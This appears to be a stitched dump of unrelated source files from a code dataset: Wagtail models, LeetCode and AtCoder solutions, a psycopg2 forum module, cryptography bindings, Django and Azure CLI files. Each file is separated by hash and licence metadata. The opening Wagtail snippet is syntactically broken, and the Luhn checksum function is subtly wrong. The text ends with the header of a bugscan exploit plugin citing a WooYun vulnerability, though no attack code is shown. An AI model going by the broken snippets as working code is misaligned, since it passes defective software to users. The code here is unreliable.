from wagtail.core.models import Orderable
from wagtail.admin.edit_handlers import FieldPanel
class MenuItem(Orderable):
link_title = models.CharField(blank )
link_url = external_link
link_page = internal_link
open_in_new_tab
class Menu(ClusterableModel):
title = models.CharField(max_length=100)
slug = AutoSlugField(
populate_from='title',
editable=True,
)
panels = [
FieldPanel('title'),
FieldPanel('slug'),
]
def __str__(self):
return self.title
| [
"[email protected]"
] | |
a550d9b8ed43cb34d14d403265c426d95c868ae4 | 74091dce735f281188d38d2f00d1a68e1d38ff7a | /design_patterns/observer/with_observer/observer_abc/__init__.py | fc74947e39033cd126ee8f4e688bf13e5b204ab0 | [] | no_license | nbiadrytski-zz/python-training | 96741aa0ef37bda32d049fde5938191025fe2924 | 559a64aae2db51e11812cea5ff602f25953e8070 | refs/heads/master | 2023-05-07T04:08:23.898161 | 2019-12-10T12:12:59 | 2019-12-10T12:12:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from design_patterns.observer.with_observer.observer_abc.observer_abc import AbsObserver
from design_patterns.observer.with_observer.observer_abc.subject_abc import AbsSubject | [
"[email protected]"
] | |
2fd0d81d5757eb5301956fc98513bcb6f034e338 | 7410903c6cd5ef35c592af00c934fb21c369cbf2 | /00_Code/01_LeetCode/15_3Sum.py | 48ca0cefdb8c2e3ea535801f329f89a117a056e8 | [
"MIT"
] | permissive | KartikKannapur/Algorithms | f4e4726170599db0622d18e8c06a382e9bce9e77 | 66e3c8112826aeffb78bd74d02be1a8d1e478de8 | refs/heads/master | 2020-12-25T18:32:41.086518 | 2020-10-19T02:59:47 | 2020-10-19T02:59:47 | 93,961,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,341 | py | """
Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Note: The solution set must not contain duplicate triplets.
For example, given array S = [-1, 0, 1, 2, -1, -4],
A solution set is:
[
[-1, 0, 1],
[-1, -1, 2]
]
Your runtime beats 48.41 % of python submissions
"""
class Solution(object):
def threeSum(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
# #Special Case
if len(nums) < 3: return []
if len(nums) == 3:
if sum(nums) == 0:
return [sorted(nums)]
# #General Case
nums.sort()
res = []
for i in range(len(nums) - 2):
low = i + 1
high = len(nums) - 1
# #To handle Time Limit Exceeded Error
if i != 0 and nums[i] == nums[i - 1]:
continue
while low < high:
temp_sum = nums[i] + nums[low] + nums[high]
if temp_sum == 0:
res.append((nums[i], nums[low], nums[high]))
if temp_sum > 0:
high -= 1
else:
low += 1
# #Return unique elements
return list(set(tuple(res))) | [
"[email protected]"
] | |
28d3ad73c52557c945c1d6527b8e8b08169df786 | 7370b067695d6636273ee635b3e78b022be16a62 | /fullstack/vagrant/forum/forumdb.py | 403e89ac5b0de33e55b2add36c6f6753c544d7d6 | [] | no_license | jreiher2003/intro-to-relational-databases | 56b2f66e5f7a23144b8a1f011d0bcedcf5a07da3 | a589cb736757708635b7b6bb6688cd2d9d574a85 | refs/heads/master | 2020-12-24T13:44:50.200881 | 2015-04-14T14:45:54 | 2015-04-14T14:45:54 | 33,775,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | #
# Database access functions for the web forum.
#
import psycopg2
import time
import bleach
## Get posts from database.
def GetAllPosts():
'''Get all the posts from the database, sorted with the newest first.
Returns:
A list of dictionaries, where each dictionary has a 'content' key
pointing to the post content, and 'time' key pointing to the time
it was posted.
'''
## Database connection
DB = psycopg2.connect("dbname=forum")
c = DB.cursor()
c.execute("SELECT time, content FROM posts ORDER BY time DESC")
posts = ({'content': str(bleach.clean(row[1])), 'time': str(row[0])} for row in c.fetchall())
#DB.commit()?
DB.close()
return posts
## Add a post to the database.
def AddPost(content):
'''Add a new post to the database.
Args:
content: The text content of the new post.
'''
DB = psycopg2.connect("dbname=forum")
c = DB.cursor()
c.execute("INSERT INTO posts (content) VALUES (%s)", (content,))
DB.commit()
DB.close()
| [
"[email protected]"
] | |
d9115b79d1e0ebf6bd315330b1bc516e8c40b72b | c224200e8d273b2d215e1b68c8bb7798fe0ca714 | /python/ccard/luhn.py | 4d988dfaa53f5803ebe99205be2b09fe9e6a145e | [] | no_license | mpranj/mcandre | c9c6db22be95f71a350bf05e922eb03befa9c6b1 | 9bf5c3ab0ee24ab7041ef4732d0017e869ae683d | refs/heads/master | 2021-01-18T12:46:37.096984 | 2014-06-26T03:46:56 | 2014-06-26T03:46:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | """Luhn checksum"""
def luhn(n):
"""luhnsum(int) -> bool
Mod 10 checksum by Hans Peter Luhn (1896-1964)
"""
s = 0
while n:
r = n % 100
n /= 100
z = r % 10
r /= 10 * 2
s += r / 10 + r % 10 + z
return s % 10 == 0
| [
"[email protected]"
] | |
a7b3a447dfd2a17561d5fe2e7b964ac450fe341e | 30566a736f0c8234254c7d832333f0f8e7650c2e | /mlh/apps/qs_answer/apps.py | ba4f6dbf49192440a9295f70ca605d2b7023a213 | [] | no_license | AmirHuang/mlh | daa59f16a2ac3716195bf6dfbea0e27d9bcc994e | c0df44858d0951e345de245505ae8f71f8b5e1b6 | refs/heads/master | 2020-05-04T14:28:17.289664 | 2019-04-03T02:52:35 | 2019-04-03T02:52:35 | 179,198,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class QsAnswerConfig(AppConfig):
name = 'qs_answer'
| [
"[email protected]"
] | |
0dc249d0af3a80caa218ae4f6819b1a99c530f06 | 92be2d8c4a64d5f8c43341be7f1e36b81fce56ab | /src/azure-cli/azure/cli/command_modules/monitor/aaz/latest/monitor/private_link_scope/private_endpoint_connection/__cmd_group.py | 51676cfe96f1d5df414faa020e70a8f2b2eda9b2 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | allanpedroni/azure-cli | b31d3347f377208b502231266d4839196e574c4b | 4e21baa4ff126ada2bc232dff74d6027fd1323be | refs/heads/dev | 2023-08-31T18:27:03.240944 | 2023-08-31T08:49:58 | 2023-08-31T08:49:58 | 204,767,533 | 0 | 0 | MIT | 2023-09-14T13:32:41 | 2019-08-27T18:41:15 | Python | UTF-8 | Python | false | false | 718 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command_group(
"monitor private-link-scope private-endpoint-connection",
is_preview=True,
)
class __CMDGroup(AAZCommandGroup):
"""Manage private endpoint connection of a private link scope resource.
"""
pass
__all__ = ["__CMDGroup"]
| [
"[email protected]"
] | |
a6dec3fb3b780def85cc7985436fbc0609ee67c1 | 612b2dcd643ca7b36ac141a1d62c73b8e5f5d1aa | /06_operacje_na_plikach_2019-10-28/zad_3_cytaty_5_linii.py | 8b8614a0d4f0a6e66e0f536e5657adf3eda1e388 | [] | no_license | MirekPz/PyCode | e41fecb3bec8b40e41efe9db1be036038b94da1b | 95e1c349beb4fcd0ec1d8c36d000665f28ee794f | refs/heads/master | 2020-08-07T10:54:37.488009 | 2020-02-10T08:41:17 | 2020-02-10T08:41:17 | 213,421,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | """
Wyświetl tylko 5 pierwszych linii
"""
filename = "cytaty.txt"
with open(filename, encoding="UTF-8") as file:
for i in range(5):
list_of_quotations = file.readline()
print(list_of_quotations)
| [
"[email protected]"
] | |
2482f871dff5c01612e22eef2f7419c903a53bca | eb473c4b2ca6cfdfa11536a460b88f2aa6dff8c8 | /lib/dataformat/blockreplica.py | d072623269f1bd55ed55bcb45d6214af1483197b | [] | no_license | thannan6/dynamo | 4ff13bd85c9e15c755e89e67e26eaa214e0a5b39 | 8db847b8d0094890110cfc805a34703fb89f564f | refs/heads/master | 2021-05-10T00:01:52.252731 | 2018-01-22T02:35:27 | 2018-01-22T02:35:27 | 118,819,891 | 0 | 0 | null | 2018-01-24T20:45:31 | 2018-01-24T20:45:31 | null | UTF-8 | Python | false | false | 4,797 | py | from exceptions import ObjectError
class BlockReplica(object):
"""Block placement at a site. Holds an attribute 'group' which can be None.
BlockReplica size can be different from that of the Block."""
__slots__ = ['_block', '_site', 'group', 'is_complete', 'is_custodial', 'size', 'last_update', 'files']
@property
def block(self):
return self._block
@property
def site(self):
return self._site
def __init__(self, block, site, group, is_complete = False, is_custodial = False, size = -1, last_update = 0):
self._block = block
self._site = site
self.group = group
self.is_complete = is_complete
self.is_custodial = is_custodial
if size < 0:
self.size = block.size
else:
self.size = size
self.last_update = last_update
# set of File objects for incomplete replicas (not implemented)
self.files = None
def __str__(self):
return 'BlockReplica %s:%s (group=%s, is_complete=%s, size=%d, last_update=%d)' % \
(self._site.name, self._block.full_name(),
self.group.name, self.is_complete, self.size, self.last_update)
def __repr__(self):
return 'BlockReplica(block=%s, site=%s, group=%s)' % (repr(self._block), repr(self._site), repr(self.group))
def __eq__(self, other):
return self is other or \
(self._block.full_name() == other._block.full_name() and self._site.name == other._site.name and \
self.group.name == other.group.name and \
self.is_complete == other.is_complete and self.is_custodial == other.is_custodial and \
self.size == other.size and self.last_update == other.last_update)
def __ne__(self, other):
return not self.__eq__(other)
def copy(self, other):
if self._block.full_name() != other._block.full_name():
raise ObjectError('Cannot copy a replica of %s into a replica of %s', other._block.full_name(), self._block.full_name())
if self._site.name != other._site.name:
raise ObjectError('Cannot copy a replica at %s into a replica at %s', other._site.name, self._site.name)
self.group = other.group
self.is_complete = other.is_complete
self.is_custodial = other.is_custodial
self.size = other.size
self.last_update = other.last_update
def unlinked_clone(self):
block = self._block.unlinked_clone()
site = self._site.unlinked_clone()
group = self.group.unlinked_clone()
return BlockReplica(block, site, group, self.is_complete, self.is_custodial, self.size, self.last_update)
def embed_into(self, inventory, check = False):
try:
dataset = inventory.datasets[self._block.dataset.name]
except KeyError:
raise ObjectError('Unknown dataset %s', self._block.dataset.name)
block = dataset.find_block(self._block.name, must_find = True)
try:
site = inventory.sites[self._site.name]
except KeyError:
raise ObjectError('Unknown site %s', self._site.name)
try:
group = inventory.groups[self.group.name]
except KeyError:
raise ObjectError('Unknown group %s', self.group.name)
replica = block.find_replica(site)
updated = False
if replica is None:
replica = BlockReplica(block, site, group, self.is_complete, self.is_custodial, self.size, self.last_update)
dataset_replica = dataset.find_replica(site, must_find = True)
dataset_replica.block_replicas.add(replica)
block.replicas.add(replica)
site.add_block_replica(replica)
updated = True
elif check and (replica is self or replica == self):
# identical object -> return False if check is requested
pass
else:
replica.copy(self)
site.update_partitioning(replica)
updated = True
if check:
return replica, updated
else:
return replica
def delete_from(self, inventory):
dataset = inventory.datasets[self._block.dataset.name]
block = dataset.find_block(self._block.name, must_find = True)
site = inventory.sites[self._site.name]
dataset_replica = site.find_dataset_replica(dataset)
replica = block.find_replica(site, must_find = True)
site.remove_block_replica(replica)
dataset_replica.block_replicas.remove(replica)
block.replicas.remove(replica)
def write_into(self, store, delete = False):
if delete:
store.delete_blockreplica(self)
else:
store.save_blockreplica(self)
| [
"[email protected]"
] | |
851052faa0844695302437d571d870c4409cc072 | 3ef70fe63acaa665e2b163f30f1abd0a592231c1 | /stackoverflow/venv/lib/python3.6/site-packages/cryptography/hazmat/backends/openssl/x25519.py | 9aab25b86adb28ad744e0cc3682073d4dfda55a1 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | wistbean/learn_python3_spider | 14914b63691ac032955ba1adc29ad64976d80e15 | 40861791ec4ed3bbd14b07875af25cc740f76920 | refs/heads/master | 2023-08-16T05:42:27.208302 | 2023-03-30T17:03:58 | 2023-03-30T17:03:58 | 179,152,420 | 14,403 | 3,556 | MIT | 2022-05-20T14:08:34 | 2019-04-02T20:19:54 | Python | UTF-8 | Python | false | false | 5,580 | py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import warnings
from cryptography import utils
from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import (
X25519PrivateKey, X25519PublicKey
)
_X25519_KEY_SIZE = 32
@utils.register_interface(X25519PublicKey)
class _X25519PublicKey(object):
def __init__(self, backend, evp_pkey):
self._backend = backend
self._evp_pkey = evp_pkey
def public_bytes(self, encoding=None, format=None):
if encoding is None or format is None:
if encoding is not None or format is not None:
raise ValueError("Both encoding and format are required")
else:
warnings.warn(
"public_bytes now requires encoding and format arguments. "
"Support for calling without arguments will be removed in "
"cryptography 2.7",
utils.DeprecatedIn25,
)
encoding = serialization.Encoding.Raw
format = serialization.PublicFormat.Raw
if (
encoding is serialization.Encoding.Raw or
format is serialization.PublicFormat.Raw
):
if (
encoding is not serialization.Encoding.Raw or
format is not serialization.PublicFormat.Raw
):
raise ValueError(
"When using Raw both encoding and format must be Raw"
)
return self._raw_public_bytes()
if (
encoding in serialization._PEM_DER and
format is not serialization.PublicFormat.SubjectPublicKeyInfo
):
raise ValueError(
"format must be SubjectPublicKeyInfo when encoding is PEM or "
"DER"
)
return self._backend._public_key_bytes(
encoding, format, self, self._evp_pkey, None
)
def _raw_public_bytes(self):
ucharpp = self._backend._ffi.new("unsigned char **")
res = self._backend._lib.EVP_PKEY_get1_tls_encodedpoint(
self._evp_pkey, ucharpp
)
self._backend.openssl_assert(res == 32)
self._backend.openssl_assert(ucharpp[0] != self._backend._ffi.NULL)
data = self._backend._ffi.gc(
ucharpp[0], self._backend._lib.OPENSSL_free
)
return self._backend._ffi.buffer(data, res)[:]
@utils.register_interface(X25519PrivateKey)
class _X25519PrivateKey(object):
def __init__(self, backend, evp_pkey):
self._backend = backend
self._evp_pkey = evp_pkey
def public_key(self):
bio = self._backend._create_mem_bio_gc()
res = self._backend._lib.i2d_PUBKEY_bio(bio, self._evp_pkey)
self._backend.openssl_assert(res == 1)
evp_pkey = self._backend._lib.d2i_PUBKEY_bio(
bio, self._backend._ffi.NULL
)
self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL)
evp_pkey = self._backend._ffi.gc(
evp_pkey, self._backend._lib.EVP_PKEY_free
)
return _X25519PublicKey(self._backend, evp_pkey)
def exchange(self, peer_public_key):
if not isinstance(peer_public_key, X25519PublicKey):
raise TypeError("peer_public_key must be X25519PublicKey.")
return _evp_pkey_derive(
self._backend, self._evp_pkey, peer_public_key
)
def private_bytes(self, encoding, format, encryption_algorithm):
if (
encoding is serialization.Encoding.Raw or
format is serialization.PublicFormat.Raw
):
if (
format is not serialization.PrivateFormat.Raw or
encoding is not serialization.Encoding.Raw or not
isinstance(encryption_algorithm, serialization.NoEncryption)
):
raise ValueError(
"When using Raw both encoding and format must be Raw "
"and encryption_algorithm must be NoEncryption()"
)
return self._raw_private_bytes()
if (
encoding in serialization._PEM_DER and
format is not serialization.PrivateFormat.PKCS8
):
raise ValueError(
"format must be PKCS8 when encoding is PEM or DER"
)
return self._backend._private_key_bytes(
encoding, format, encryption_algorithm, self._evp_pkey, None
)
def _raw_private_bytes(self):
# When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can
# switch this to EVP_PKEY_new_raw_private_key
# The trick we use here is serializing to a PKCS8 key and just
# using the last 32 bytes, which is the key itself.
bio = self._backend._create_mem_bio_gc()
res = self._backend._lib.i2d_PKCS8PrivateKey_bio(
bio, self._evp_pkey,
self._backend._ffi.NULL, self._backend._ffi.NULL,
0, self._backend._ffi.NULL, self._backend._ffi.NULL
)
self._backend.openssl_assert(res == 1)
pkcs8 = self._backend._read_mem_bio(bio)
self._backend.openssl_assert(len(pkcs8) == 48)
return pkcs8[-_X25519_KEY_SIZE:]
| [
"[email protected]"
] | |
0c53c8c3135c11ac44c7ed5ad9f0094da5ce9c6a | 839b26d2d837f256423c11908a2a3618ab8a23f3 | /dashboard/dashboard/update_bug_with_results_test.py | 7b4282e95a1380e535001797e6710cb237eb8f78 | [
"BSD-3-Clause"
] | permissive | Mdlglobal-atlassian-net/catapult | 79be5d4ec5d681c1d2f37ae83534a02f4a4ec72a | e9a386951413e7cbf983abf968626b2e5097fc38 | refs/heads/master | 2022-02-27T15:18:45.524790 | 2020-06-01T07:12:27 | 2020-06-01T22:57:01 | 268,672,431 | 0 | 1 | BSD-3-Clause | 2020-06-02T01:31:05 | 2020-06-02T01:31:04 | null | UTF-8 | Python | false | false | 2,403 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
import mock
from dashboard import update_bug_with_results
from dashboard.common import namespaced_stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
# In this class, we patch apiclient.discovery.build so as to not make network
# requests, which are normally made when the IssueTrackerService is initialized.
@mock.patch('apiclient.discovery.build', mock.MagicMock())
@mock.patch.object(utils, 'ServiceAccountHttp', mock.MagicMock())
@mock.patch.object(utils, 'TickMonitoringCustomMetric', mock.MagicMock())
class UpdateBugWithResultsTest(testing_common.TestCase):
def setUp(self):
super(UpdateBugWithResultsTest, self).setUp()
self.SetCurrentUser('[email protected]', is_admin=True)
namespaced_stored_object.Set('repositories', {
'chromium': {
'repository_url': 'https://chromium.googlesource.com/chromium/src'
},
})
def testMapAnomaliesToMergeIntoBug(self):
# Add anomalies.
test_keys = list(
map(utils.TestKey, [
'ChromiumGPU/linux-release/scrolling-benchmark/first_paint',
'ChromiumGPU/linux-release/scrolling-benchmark/mean_frame_time'
]))
anomaly.Anomaly(
start_revision=9990,
end_revision=9997,
test=test_keys[0],
median_before_anomaly=100,
median_after_anomaly=200,
bug_id=12345).put()
anomaly.Anomaly(
start_revision=9990,
end_revision=9996,
test=test_keys[0],
median_before_anomaly=100,
median_after_anomaly=200,
bug_id=54321).put()
# Map anomalies to base(dest_bug_id) bug.
update_bug_with_results._MapAnomaliesToMergeIntoBug(
dest_issue=update_bug_with_results.IssueInfo('chromium', 12345),
source_issue=update_bug_with_results.IssueInfo('chromium', 54321))
anomalies = anomaly.Anomaly.query(
anomaly.Anomaly.bug_id == int(54321),
anomaly.Anomaly.project_id == 'chromium').fetch()
self.assertEqual(0, len(anomalies))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
96aa347b5f76f2db0199a18000c0f91940d0bcf7 | 7ec04fc867d0a48fffc05c65bff9217cfe211fe7 | /HW/myTest1.py | 9aeb7c4359629e0d3d917b41f10bd9d23c29e166 | [] | no_license | Cherry93/pythonPractic | 3b9d1f99803503073bbb2f3a58009665338bd278 | 2889183af6c9a01ab47895b23e2d6ce8c288fd4d | refs/heads/master | 2021-08-31T16:41:56.655989 | 2017-12-22T03:53:18 | 2017-12-22T03:53:18 | 115,008,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | import mytool.supperTurtules
print(mytool.supperTurtules.drawLine(-50,-50,50,50,10,"red")) | [
"[email protected]"
] | |
71fa0ac2a1bc628676d9568ea30eb2a2900822aa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02951/s416256902.py | e351c2216c8cf5ccf323b15b115c1f535f573c84 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | a,b,c=map(int,input().split())
if c-(a-b)>0:
print(c-(a-b))
else:
print("0")
| [
"[email protected]"
] | |
8f926e08fc1dc61bbc483c5c73e906cf776d5658 | 6930a434c0506d44bf8a8e81cb86e95c219c3a77 | /python/day19/code/bool.py | dbd9efd62a9608472ca8da6ae9bf5321b9911546 | [] | no_license | Conquerk/test | ed15d5603538340559556c9e0f20cc61ad3e4486 | 7ff42c99b8a2132c6dd1c73315ff95cfef63a8f6 | refs/heads/master | 2020-04-19T01:47:28.322929 | 2019-01-28T01:52:00 | 2019-01-28T01:52:00 | 167,882,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | class a:
# def __bool__(self):
# print("bool方法被调用")
# return False
def __len__(self):
print('len被调用')
return 5
x=a()
print(bool(x))
if x :
print("x 为真值")
else:
print("x 为假值") | [
"[email protected]"
] | |
4a66f501d21dc0e21b25cd557749a229c108d7bf | f85ce2baf753d65e8666bbda062acbdb0ccdb5ad | /leetcode/venv/lib/python2.7/site-packages/pyutil/common/multi_proxy.py | 4464833378477d0125b57f50987802b986064008 | [] | no_license | KqSMea8/PycharmProjects | 2a9d3fa59d08c77daf63be427da27695d4dea471 | c592d879fd79da4e0816a4f909e5725e385b6160 | refs/heads/master | 2020-04-14T11:54:56.435247 | 2019-01-02T10:15:36 | 2019-01-02T10:15:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | # coding=utf-8
__author__ = 'qiukun'
class MultiProxy():
"""
typical usage:
p = MultiProxy([a, b])
对 p 的方法调用会应用到 a, b,返回 b(最后一个对象)对应方法的返回值
e.g.
buf = p.r()
p.write()
"""
def __init__(self, objs):
"""
:param objs: a iterator of objs to be proxyed.
:return: the proxy
"""
self.objs = objs
def __getattr__(self, item):
def wrapper(*args, **kwargs):
rt = None
for o in self.objs:
rt = getattr(o, item)(*args, **kwargs)
return rt
return wrapper | [
"[email protected]"
] | |
ebca6a39db8c0a22574b611a0271ac7bc9a10d1d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02791/s398923350.py | 525b6e69293b56cf550f10a02c0494389a8a6380 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
N = int(readline())
P = list(map(int, readline().split()))
cur = N + 1
ans = 0
for x in P:
if cur > x:
ans += 1
cur = x
print(ans)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
ccccc364d5e5480a14cd01e9facbb6cb9445987c | 3e24611b7315b5ad588b2128570f1341b9c968e8 | /pacbiolib/pacbio/pythonpkgs/pbtranscript/lib/python2.7/site-packages/pbtranscript/ice/make_input_fasta_fofn.py | 77356562bf1686d47a5b7653eb24734ce3d41869 | [
"BSD-2-Clause"
] | permissive | bioCKO/lpp_Script | dc327be88c7d12243e25557f7da68d963917aa90 | 0cb2eedb48d4afa25abc2ed7231eb1fdd9baecc2 | refs/heads/master | 2022-02-27T12:35:05.979231 | 2019-08-27T05:56:33 | 2019-08-27T05:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,072 | py | #! python
"""Given input.fofn, for each movie.bas|bax.h5 file in the fofn,
call pls2fasta to generate a movie.bax|bas.h5.fasta file in a
specified directory, and then trim both ends of each read in fasta
files. Finally, add all these fasta files to fasta_fofn
(e.g., input.fasta.fofn).
"""
import logging
import sys
import os.path as op
from pbtranscript.__init__ import get_version
from pbtranscript.ice.IceUtils import convert_fofn_to_fasta
def set_parser(parser):
"""Get arguments."""
parser.add_argument("input_fofn",
help="Input bax.h5 fofn, e.g., input.fofn")
parser.add_argument("fasta_fofn",
help="Output fasta fofn, e.g., input.fasta.fofn")
parser.add_argument("fasta_out_dir",
help="Where to save generated fasta files")
from pbcore.util.ToolRunner import PBToolRunner
class MakeFastaFofnRunner(PBToolRunner):
"""ice_make_input_fasta_fofn runner."""
def __init__(self):
desc = "Converting bas/bax.h5 files within a fofn to fasta " + \
"files and create a fasta fofn."
PBToolRunner.__init__(self, desc)
set_parser(self.parser)
def getVersion(self):
"""Return version string."""
return get_version()
def run(self):
"""Run"""
logging.info("Running {f} v{v}.".format(f=op.basename(__file__),
v=get_version()))
args = self.args
try:
convert_fofn_to_fasta(fofn_filename=args.input_fofn,
out_filename=args.fasta_fofn,
fasta_out_dir=args.fasta_out_dir,
force_overwrite=False)
except:
logging.exception("Failed to convert fofn {f} to fasta.".
format(f=args.input_fofn))
return 1
return 0
def main():
"""Main function."""
runner = MakeFastaFofnRunner()
return runner.start()
if __name__ == "__main__":
sys.exit(main())
| [
"[email protected]"
] | |
99b4337e7934e957fe1496cda64778117b102922 | bc2a85e8dd9244f89e2f1801cc19d570a87c74ed | /Leetcode/Algorithms/Easy/Arrays/MeetingTime.py | 4e389ed460c2d8ac9a19f0e4c01beffd544cb5ce | [] | no_license | christian-miljkovic/interview | 1cab113dbe0096e860a3ae1d402901a15e808e32 | 63baa1535b788bc3e924f3c24a799bade6a2eae3 | refs/heads/master | 2023-01-11T14:53:09.304307 | 2020-02-04T17:35:12 | 2020-02-04T17:35:12 | 193,549,798 | 0 | 0 | null | 2023-01-05T05:56:15 | 2019-06-24T17:28:50 | Python | UTF-8 | Python | false | false | 1,944 | py | """
Time Planner
Implement a function meetingPlanner that given the availability, slotsA and slotsB, of two people and a meeting duration dur, returns the earliest time slot that works for both of them and is of duration dur. If there is no common time slot that satisfies the duration requirement, return an empty array.
Time is given in a Unix format called Epoch, which is a nonnegative integer holding the number of seconds that have elapsed since 00:00:00 UTC, Thursday, 1 January 1970.
Each person’s availability is represented by an array of pairs. Each pair is an epoch array of size two. The first epoch in a pair represents the start time of a slot. The second epoch is the end time of that slot. The input variable dur is a positive integer that represents the duration of a meeting in seconds. The output is also a pair represented by an epoch array of size two.
In your implementation assume that the time slots in a person’s availability are disjointed, i.e, time slots in a person’s availability don’t overlap. Further assume that the slots are sorted by slots’ start time.
Implement an efficient solution and analyze its time and space complexities.
Examples:
input: slotsA = [[10, 50], [60, 120], [140, 210]]
slotsB = [[0, 15], [60, 70]]
dur = 8
output: [60, 68]
input: slotsA = [[10, 50], [60, 120], [140, 210]]
slotsB = [[0, 15], [60, 70]]
dur = 12
output: [] # since there is no common slot whose duration is 12
"""
def meeting_planner(slotsA, slotsB, dur):
result = []
for i in range(0,len(slotsA)):
startA = slotsA[i][0]
endA = slotsA[i][1]
for j in range(0,len(slotsB)):
startB = slotsB[j][0]
endB = slotsB[j][1]
min_time = min(endA, endB)
max_time = max(startA, startB)
bound = min_time - max_time
if bound >= dur:
result.append(max_time)
result.append(max_time+dur)
return result | [
"[email protected]"
] | |
116c8f86cfaa52e4e72d3024334d871d5eb5ebab | 8311a0bcf3f2126d622f928483ce2ea9d6a7cb0d | /Code/Matthew/django/mysite/polls/migrations/0001_initial.py | 967a82248a77534828deedc67a2aec779b4c3227 | [] | no_license | guam68/class_iguana | 857247dca0ff732d11f7fb0d3dc761ec83846c94 | e4359d32dfe60423a643c21df5636669016ad2c0 | refs/heads/master | 2020-05-01T06:33:22.611127 | 2019-03-13T23:07:41 | 2019-03-13T23:07:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # Generated by Django 2.1.5 on 2019-02-07 18:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| [
"[email protected]"
] | |
aa59fe19a4acba2c251b00e81b73e30f348144c8 | 9e20f7e71faa2853516f88ee7672e1323d12e8f7 | /seq_lda/algorithms/__init__.py | d3ed380d3428aab45ed45e014fe016bca4131374 | [] | no_license | e2crawfo/seq_lda | 3270a07781369d318c0cf2e75cdbfee96423c52d | ebe3caea127575f6e54884bf0d32ac6d4a876d4e | refs/heads/master | 2020-09-17T18:55:19.562861 | 2017-03-28T16:10:52 | 2017-03-28T16:10:52 | 67,877,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | from .markov_lda import generate_markov_chains
from .lda import LDA
from .mssg import MSSG, SingleMSSG
from .baseline import OneByOne, Aggregate
| [
"[email protected]"
] | |
be6ac3323527ef02eb9d8a966231f7f830aaed04 | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_885.py | 701317e53735eabbc5a8dcc364e6082aba740f46 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0110861
#__Author__ = 上善若水
